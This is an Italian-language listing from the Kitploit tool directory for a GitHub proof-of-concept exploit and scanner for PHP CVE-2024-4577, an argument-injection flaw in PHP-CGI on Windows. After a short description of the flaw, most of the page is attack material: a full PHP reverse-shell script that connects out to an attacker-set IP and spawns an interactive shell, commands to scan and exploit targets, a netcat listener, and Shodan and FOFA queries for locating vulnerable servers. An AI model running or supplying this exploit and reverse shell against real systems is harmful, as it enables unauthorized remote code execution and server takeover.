Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/bibo318/cve-2024-4577-rce-attack
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubbibo318/cve-2024-4577-rce-attack

CVE-2024-4577-RCE-ATTACK

ATTACK PoC - PHP CVE-2024-4577

Vedi Repository
532 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PHP CVE-2024-4577-RCE-ATTACK-ATTACK

Medium Python Kali

📜 Descrizione

Nelle versioni PHP 8.1.* precedenti a 8.1.29, 8.2.* precedenti a 8.2.20, 8.3.* precedenti a 8.3.8, quando si utilizza Apache e PHP-CGI su Windows, se il sistema è configurato per utilizzare determinate tabelle codici, Windows può utilizzare il comportamento "Best Fit" per sostituire i caratteri nella riga di comando fornita alle funzioni API Win32. Il modulo PHP CGI potrebbe interpretare erroneamente tali caratteri come opzioni PHP, il che potrebbe consentire a un utente malintenzionato di passare opzioni al binario PHP in esecuzione e quindi divulgare il codice sorgente dello script, eseguire codice PHP arbitrario sul server, ecc.

"XAMPP è vulnerabile nella configurazione predefinita e possiamo prendere di mira l'endpoint /php-cgi/php-cgi.exe. Per prendere di mira un endpoint .php esplicito (es. /index.php), il server deve essere configurato per eseguire script PHP in modalità CGI."

📚 Indice

  • 📜 Descrizione
  • 🛠️ Installazione
Scarica lo strumento
  • ⚙️ Utilizzo
  • 💁 Riferimenti
  • 🛠️ Installazione

    root@kitploit:~
    $ git clone https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK.git
    $ cd CVE-2024-4577-RCE-ATTACK && pip install -r requirements.txt 
    

    ⚙️ Utilizzo

    php-cge

    🤖 Configurazione reverse shell

    PHP Payload

    [!NOTE] Questo strumento mostra tecniche, tattiche e procedure reali (TTP). Tuttavia, questo specifico payload di esempio non funziona in questo caso. Modifica shell.php per ottenere un payload completamente funzionante.

    root@kitploit:~
    # rev_shell.php
    <?php
    // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
    
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = 'xxxxxxxxxxx';  // CHANGE THIS
    $port = 9999;       // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    
    //
    // Daemonise ourself if possible to avoid zombies later
    //
    
    // pcntl_fork is hardly ever available, but will allow us to daemonise
    // our php process and avoid zombies.  Worth a try...
    if (function_exists('pcntl_fork')) {
    	// Fork and have the parent process exit
    	$pid = pcntl_fork();
    	
    	if ($pid == -1) {
    		printit("ERROR: Can't fork");
    		exit(1);
    	}
    	
    	if ($pid) {
    		exit(0);  // Parent exits
    	}
    
    	// Make the current process a session leader
    	// Will only succeed if we forked
    	if (posix_setsid() == -1) {
    		printit("Error: Can't setsid()");
    		exit(1);
    	}
    
    	$daemon = 1;
    } else {
    	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    
    // Change to a safe directory
    chdir("/");
    
    // Remove any umask we inherited
    umask(0);
    
    //
    // Do the reverse shell...
    //
    
    // Open reverse connection
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$sock) {
    	printit("$errstr ($errno)");
    	exit(1);
    }
    
    // Spawn shell process
    $descriptorspec = array(
       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
       2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );
    
    $process = proc_open($shell, $descriptorspec, $pipes);
    
    if (!is_resource($process)) {
    	printit("ERROR: Can't spawn shell");
    	exit(1);
    }
    
    // Set everything to non-blocking
    // Reason: Occsionally reads will block, even though stream_select tells us they won't
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);
    
    printit("Successfully opened reverse shell to $ip:$port");
    
    while (1) {
    	// Check for end of TCP connection
    	if (feof($sock)) {
    		printit("ERROR: Shell connection terminated");
    		break;
    	}
    
    	// Check for end of STDOUT
    	if (feof($pipes[1])) {
    		printit("ERROR: Shell process terminated");
    		break;
    	}
    
    	// Wait until a command is end down $sock, or some
    	// command output is available on STDOUT or STDERR
    	$read_a = array($sock, $pipes[1], $pipes[2]);
    	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    
    	// If we can read from the TCP socket, send
    	// data to process's STDIN
    	if (in_array($sock, $read_a)) {
    		if ($debug) printit("SOCK READ");
    		$input = fread($sock, $chunk_size);
    		if ($debug) printit("SOCK: $input");
    		fwrite($pipes[0], $input);
    	}
    
    	// If we can read from the process's STDOUT
    	// send data down tcp connection
    	if (in_array($pipes[1], $read_a)) {
    		if ($debug) printit("STDOUT READ");
    		$input = fread($pipes[1], $chunk_size);
    		if ($debug) printit("STDOUT: $input");
    		fwrite($sock, $input);
    	}
    
    	// If we can read from the process's STDERR
    	// send data down tcp connection
    	if (in_array($pipes[2], $read_a)) {
    		if ($debug) printit("STDERR READ");
    		$input = fread($pipes[2], $chunk_size);
    		if ($debug) printit("STDERR: $input");
    		fwrite($sock, $input);
    	}
    }
    
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    
    // Like print, but does nothing if we've daemonised ourself
    // (I can't figure out how to redirect STDOUT like a proper daemon)
    function printit ($string) {
    	if (!$daemon) {
    		print "$string\n";
    	}
    }
    
    ?> 
    

    🖥️ Scansione del server

    root@kitploit:~
    $ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'             
             Author: Demongod | CVE-2024-4577 | PoC and Scanner |                     
        
    [+] Il target https://xxxx.com è vulnerabile a CVE-2024-4577
    

    🎯 Sfruttamento del server vulnerabile

    root@kitploit:~
    $ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'  
            Author: Demongod | CVE-2024-4577 | PoC and Scanner |
    
    [+] Exploit riuscito!
    

    👨🏻‍💻 Netcat Listener

    root@kitploit:~
    $ nc -lvnp 9999
    

    🔍 Rilevamento server vulnerabili

    • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
    • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

    💁 Riferimenti

    • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
    • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
    • http://www.openwall.com/lists/oss-security/2024/06/07/1
    • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
    • https://www.php.net/ChangeLog-8.php#8.1.29
    • https://www.php.net/ChangeLog-8.php#8.2.20
    • https://www.php.net/ChangeLog-8.php#8.3.8

    ⚠️ Dichiarazione di non responsabilità

    Questo strumento è fornito solo a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per qualsiasi uso improprio o danno causato da questo strumento. Segnala un problema